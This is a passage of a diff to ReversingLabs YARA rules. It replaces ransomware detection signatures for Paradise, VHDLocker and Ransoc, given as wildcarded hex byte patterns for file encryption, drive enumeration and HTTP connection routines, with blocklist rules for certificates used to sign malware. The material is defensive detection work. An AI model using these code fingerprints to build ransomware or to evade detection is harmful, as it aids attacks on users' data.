 		author = "ReversingLabs"
-		id = "9a92a05c-5f26-59ed-9934-a24bb7c31d8d"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "de018b47-9fbd-590e-b3d1-b50029496718"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Paradise.yara#L1-L81"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fc029bee999ec72416ac91d8386d4d270070035ad078bcab1dec11eea032c10b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16248-L16264"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e6b6a90cf40283d2e4d2d9c5732a078c9f2f117e3639ab5c0dd6c5323cb7c9ff"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Paradise"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$search_files = {
-            53 56 57 68 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
-            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 59 89 75 ?? 85 F6
-            0F 84 ?? ?? ?? ?? FF 75 ?? 8B 3D ?? ?? ?? ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? 53 56 FF
-            D7 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ??
-            ?? ?? 83 65 ?? ?? 8B 45 ?? 8B 74 85 ?? 8D 95 ?? ?? ?? ?? 85 F6 74 ?? 0F B7 02 83 F8
-            ?? 72 ?? 8D 48 ?? 83 F8 ?? 76 ?? 8B C8 0F B7 06 83 F8 ?? 72 ?? 83 F8 ?? 77 ?? 83 C0
-            ?? 3B C8 0F B7 02 75 ?? 66 85 C0 74 ?? 83 C2 ?? 83 C6 ?? EB ?? 0F B7 02 EB ?? 66 3B
-            06 1B C0 83 E0 ?? 40 EB ?? 33 C0 85 C0 0F 84 ?? ?? ?? ?? FF 45 ?? 83 7D ?? ?? 72 ??
-            8B 75 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53 56 FF D7 83 C4 ?? F6 85 ??
-            ?? ?? ?? ?? 74 ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ??
-            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 80 3D ?? ?? ?? ?? ?? 74 ?? BA
-            ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? EB ?? F6 85 ?? ?? ??
-            ?? ?? 74 ?? A1 ?? ?? ?? ?? 05 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ??
-            85 C0 75 ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? BA ?? ?? ??
-            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 59 8D 85 ?? ?? ??
-            ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 75 ?? 68
-            ?? ?? ?? ?? 53 FF 75 ?? FF D7 83 C4 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 FF 75 ?? FF 15 ??
-            ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 5F 5E 5B C9 C3
-        }
-		$encrypt_files_p1 = {
-            56 57 6A ?? BE ?? ?? ?? ?? 5F E8 ?? ?? ?? ?? 89 45 ?? 6A ?? 8D 45 ?? 50 56 E8 ?? ??
-            ?? ?? 83 C4 ?? 83 C6 ?? 4F 75 ?? 33 F6 39 75 ?? 74 ?? 8D 45 ?? 50 A1 ?? ?? ?? ?? 0F
-            B7 88 ?? ?? ?? ?? 56 56 51 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 59 89 4D
-            ?? 33 C0 8A 90 ?? ?? ?? ?? 88 90 ?? ?? ?? ?? 3B C6 75 ?? 33 C0 40 3B C1 72 ?? 68 ??
-            ?? ?? ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 56 6A ?? 56 FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ??
-            FF 15 ?? ?? ?? ?? 5F 5E C9 C3 56 FF 75 ?? FF 15 ?? ?? ?? ?? 56 FF 15
-        }
-		$encrypt_files_p2 = {
-            53 56 57 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 33 DB
-            53 53 8D 44 24 ?? 50 89 5C 24 ?? FF D6 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? 53 53 8D 44
-            24 ?? 50 FF D6 85 C0 75 ?? 89 5C 24 ?? 39 5C 24 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 0F B6 80 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF
-            74 24 ?? E8 ?? ?? ?? ?? 59 53 FF 74 24 ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 53 53
-            53 53 C6 05 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 88 1D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 59 33 C0 88 98 ?? ?? ?? ?? 3B C3 75 ?? 33 C0 40 83 F8 ?? 72 ?? 6A ?? 5E
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 C4
-            ?? 6A ?? 53 53 8D 44 24 ?? 50 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 4E 75 ?? 8B 3D ??
-            ?? ?? ?? 81 C7 ?? ?? ?? ?? 6A ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 85 C0 75 ?? 57 E8
-            ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C3
-        }
-		$http_remote_connection = {
-            53 56 57 FF 75 ?? 33 FF 8D 75 ?? 89 7D ?? E8 ?? ?? ?? ?? 59 89 7D ?? 57 57 57 FF 75
-            ?? 57 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? 57 57 6A ?? 57 57 FF 75 ??
-            FF 75 ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 3B C7 0F 84 ?? ?? ?? ?? 33 C9 80 7D ?? ?? 57
-            0F 95 C1 B8 ?? ?? ?? ?? 49 23 C8 03 C8 51 57 57 57 FF 75 ?? 68 ?? ?? ?? ?? FF 75 ??
-            FF 15 ?? ?? ?? ?? 8B D8 3B DF 74 ?? 57 57 57 57 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33
-            F6 57 57 8D 45 ?? 50 53 89 7D ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 03 C6 3B C7
-            75 ?? 89 7D ?? EB ?? 50 39 7D ?? 75 ?? E8 ?? ?? ?? ?? 59 EB ?? FF 75 ?? 6A ?? FF 15
-            ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? 50 FF 75 ?? 8B 45 ?? 03 C6 50 53
-            FF 15 ?? ?? ?? ?? 03 75 ?? 39 7D ?? 75 ?? 53 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ??
-            ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 39 7D ?? 75 ?? 33 C0 40 39 45 ?? 74 ?? 89 45 ?? E9
-            ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 59 59 5F 5E 5B
-            C9 C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $search_files and $http_remote_connection and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Wemade Entertainment" and pe.signatures [ i ] . serial == "61:00:39:d6:34:9e:e5:31:e4:ca:a3:a6:5d:10:0c:7d" and 1341792000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Vhdlocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_1Caa0D0Dadf32A2404A75195Ae47820A : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects VHDLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "696f8145-342b-5da5-b9ec-6f0d16afc465"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "5c1f82a4-c64d-556c-8c7a-213582e7bd5a"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.VHDLocker.yara#L1-L152"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "39d1fbfc79d5ea866498bb1e40d2290469df774ce65b1da04a85c0e4e5b4493c"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16266-L16282"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ab71e485c0b541fae79d246d34b1f4fb146747c1c3fb723aa87a7a32378ff974"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "VHDLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1
-            ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 6A ?? 68
-            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 89 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 50 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 0B C2 74 ?? 53 FF 15 ?? ?? ?? ?? B0 ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            33 DB 8D 95 ?? ?? ?? ?? 53 52 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 53 50 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 9D ?? ??
-            ?? ?? 89 9D ?? ?? ?? ?? 33 F6 8B FF 6A ?? 53 E8 ?? ?? ?? ?? 88 44 35 ?? 46 83 FE ??
-            7C ?? 8D 4D ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D
-            B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 8B CE 89 5D ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 8B F4 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 6A ?? 50 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? 8B 8D
-        }
-		$encrypt_files_p2 = {
-            51 E8 ?? ?? ?? ?? 83 C4 ?? 8B BD ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 57 FF 15 ?? ??
-            ?? ?? 85 C0 75 ?? 57 FF 15 ?? ?? ?? ?? 32 C0 E9 ?? ?? ?? ?? 53 8D 95 ?? ?? ?? ?? 52
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ??
-            ?? ?? ?? 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 35 ?? ??
-            ?? ?? 8B 85 ?? ?? ?? ?? 3B C3 0F 84 ?? ?? ?? ?? 6A ?? F7 D8 99 53 52 50 57 FF 15 ??
-            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 8B 8D ?? ?? ?? ?? 8D 95 ?? ??
-            ?? ?? 52 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 51 50 8D 95 ?? ?? ??
-            ?? 52 57 FF D6 85 C0 0F 84 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 81 BD ??
-            ?? ?? ?? ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 77 ?? 81 BD ?? ?? ?? ?? ??
-            ?? ?? ?? 0F 82 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? 11 9D ?? ?? ?? ??
-            83 FA ?? 0F 84 ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 52 FF 15 ?? ?? ?? ?? A1 ?? ?? ??
-            ?? 50 FF 15 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B C3 8D 50 ?? 66 8B 08 83 C0 ?? 66 85 C9
-        }
-		$encrypt_files_p3 = {
-            75 ?? 2B C2 6A ?? D1 F8 8D 8D ?? ?? ?? ?? 51 8D 14 00 A1 ?? ?? ?? ?? 52 53 50 FF D6
-            8B 15 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? 52 FF D6 8B 15 ??
-            ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 8D 4D ?? 51 52 FF D6 8B 0D ?? ?? ?? ?? 6A
-            ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ?? ?? 51 FF D6 8B 0D ?? ?? ?? ?? 6A ?? 8D 95
-            ?? ?? ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50 51 FF D6 EB ?? 8B 9D ?? ?? ?? ?? 6A ?? 33
-            C9 51 51 B8 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 33 DB EB ?? 83 85 ?? ??
-            ?? ?? ?? 11 9D ?? ?? ?? ?? 53 8D 95 ?? ?? ?? ?? 52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 57 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B 4D ?? 8B 55
-            ?? 8B B5 ?? ?? ?? ?? 51 52 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 8D 85
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B D6 52 FF 15 ?? ?? ?? ?? 33 C9
-            51 51 33 C0 51 50 A1 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 0D ?? ?? ?? ?? 51 FF 15 ??
-            ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 94 C0 8B 4D ?? 64
-            89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 68 ?? ?? ?? ?? 33 F6
-            8D 8D ?? ?? ?? ?? 33 C0 56 51 66 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 57 8D 95
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ??
-            52 FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? EB ?? 8D 9B
-            ?? ?? ?? ?? 8A 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 57 8D
-            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? E9
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ??
-            66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83
-        }
-		$find_files_p2 = {
-            D8 ?? 3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75
-            ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33
-            C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 BB ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 90
-            66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
-            ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 8B FF 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51
-            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ??
-            ?? ?? ?? 57 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ??
-            ?? ?? 52 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8B D1 83 C4 ?? 0B D0 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 74 ?? 50 51 8D
-            85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 83 C4 ?? 3A C1 75 ?? 01 0D ?? ?? ??
-            ?? 11 35 ?? ?? ?? ?? EB ?? 01 0D ?? ?? ?? ?? 11 35 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51
-            53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 5E 33 CD
-            B0 ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$get_logical_drives_list_p1 = {
-            8D 85 ?? ?? ?? ?? 50 57 89 BD ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ??
-            68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D
-            95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ?? 6A ?? 57
-            57 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ??
-            ?? ?? 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ?? ?? ?? 89
-            A5 ?? ?? ?? ?? C6 06 ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 33
-            FF 89 7D ?? 83 78 ?? ?? 72 ?? 8B 00 8D 50 ?? 8D A4 24 ?? ?? ?? ?? 8A 08 40 84 C9 75
-            ?? 57 8D 8D ?? ?? ?? ?? 2B C2 51 50 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ?? ?? BF
-            ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 A5 ?? ?? ?? ?? C6 06 ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? 83 C4 ?? 39 70 ?? 72 ?? 8B 00 50 53 FF 15 ?? ?? ??
-            ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? C7 45 ?? ??
-            ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ??
-            ?? ?? 39 B5 ?? ?? ?? ?? 72 ?? 8B 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 53 FF 15
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 8D 64 24 ?? 66 8B 10 66 3B 11 75 ?? 66 85
-            D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB
-        }
-		$get_logical_drives_list_p2 = {
-            1B C0 83 D8 ?? 85 C0 0F 85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 89 85 ?? ??
-            ?? ?? 89 B5 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CE D3 E2 85 95 ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 8D 4E ?? 66 89 8D ?? ?? ?? ?? 33 C9 6A ?? 51 8D 95 ?? ?? ?? ?? 52 C7 85 ?? ?? ??
-            ?? ?? ?? ?? ?? 66 89 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 83 F8 ?? 0F 84
-            ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 BB ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 95
-            ?? ?? ?? ?? 6A ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ??
-            ?? 83 EC ?? B8 ?? ?? ?? ?? 8B CC 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? BF ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 39 78 ?? 72 ?? 8B 00 8D
-            50 ?? 8A 08 40 84 C9 75 ?? 6A ?? 8D 8D ?? ?? ?? ?? 51 2B C2 50 83 EC ?? B8 ?? ?? ??
-            ?? 8B CC 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            39 78 ?? 72 ?? 8B 00 50 53 FF 15 ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 95 ?? ?? ??
-            ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? BE ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 B5 ?? ?? ?? ??
-            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 39 BD ?? ?? ?? ?? 72 ?? 8B 85 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 53 89 B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ??
-            ?? C6 85 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 46 89 B5 ?? ?? ?? ?? 83
-            FE ?? 0F 8C ?? ?? ?? ?? EB ?? 68 ?? ?? ?? ?? BB ?? ?? ?? ?? E8 ?? ?? ?? ?? B0 ?? 8B
-            4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $get_logical_drives_list_p* ) ) and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LivePlex Corp" and pe.signatures [ i ] . serial == "1c:aa:0d:0d:ad:f3:2a:24:04:a7:51:95:ae:47:82:0a" and 1324425600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Ransoc : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_140D2C515E8Ee9739Bb5F1B2637Dc478 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Ransoc ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a990754e-eafa-5501-a123-bcbd5aa26ca6"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "69f3ee46-87d2-5630-ba7c-4ed2924cf650"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Ransoc.yara#L1-L114"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "1f48f1b713c18b099e863d8a11e872ae84df0ea355f01cba765e8333d8d98575"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16284-L16300"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "e6724fe80959592c8741621ce604518d3e964cee5941257a99dda78b9c8bbdac"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
